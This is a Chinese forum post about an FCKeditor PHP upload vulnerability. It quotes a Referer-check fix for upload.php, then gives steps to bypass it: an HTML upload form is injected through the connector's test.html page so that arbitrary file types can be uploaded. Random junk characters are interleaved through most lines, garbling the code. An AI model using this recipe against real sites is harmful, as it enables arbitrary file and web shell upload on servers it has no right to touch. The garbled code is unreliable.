漏洞文件:editors/fckeditor/editor/filemanager/upload/php/upload.php
+ G8 ]% a' x) m$ P2 { {网上给出的修复方案是# e2 Z& A% o8 j
修复方法,删除FCK编辑器用其他的编辑器* H3 v7 v" C+ ~% H4 u& |
或者找到 editors/fckeditor/editor/filemanager/upload/php/upload.php 文件
) p# Z" U; {* o在1 Q: `& X2 D9 N7 g. ^( G1 ]
require(‘config.php’);& i0 R# i$ N$ V2 z5 V' {1 `
require(‘util.php’);9 b4 s5 x& \% u) k b
的下面添加以下代码—————————–
9 S% A" P4 K0 q3 T/ \, B$ _//防止外部提交4 e4 J# Q/ N2 ?
function outsidepost()
/ p/ x Z" x4 l9 T{
. ?$ e, q$ O4 k8 ]. ]0 h$servername=$_SERVER['SERVER_NAME'];( ]6 _, x6 d" Z% p1 x, M' C
$sub_from=@$_SERVER['HTTP_REFERER'];
[3 q9 e8 A9 J! Y$sub_len=strlen($servername);
! M) [. u x; j) b- H8 D' t$checkfrom=substr($sub_from,7,$sub_len);/ M! A2 M' ~& j8 T4 F V5 j
if($checkfrom!=$servername){# T- j& c6 {+ k0 G
echo(“you don’t outsidepost!”);0 L7 n! d) k8 ~4 k& E
exit;8 A; [# j, n; }% V
}
4 _( h# F4 h( S L& e1 O6 g/ Z% {}/ b. m! O. w. Z9 P( b
outsidepost();7 o- s+ H9 g- }2 ^
防止外部提交,但是没有防止内部提交,
# b1 e9 b% D/ u1 a6 Q利用方法:. f( L8 X: M* H; v- e! Z, R
1,打开 editors/fckeditor/editor/filemanager/browser/default/connectors/test.html
- _' s3 V6 {6 l* W: Y2,在Current Folder 框输入9 H" c# i' Y2 I- Y% P, F$ l' Z) O
<form id=frmUpload enctype=multipart/form-data action=http://www.url.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method=post>Upload a new file:<br><input type=file name=NewFile size=50><br><input id=btnUpload type=submit value=Upload></form>/ \$ } S& M! [+ O- E1 u
然后 Get Folders and Files 就会出现一个上传表单,即可上传任意文件类型。4 z: I. k2 P3 ?% `& B: U
PS:如果 editors与上传的文件夹设置了403 500 404 权限 利用就无效了。 |
发表于 2013-1-11 21:12:44
收藏
支持
反对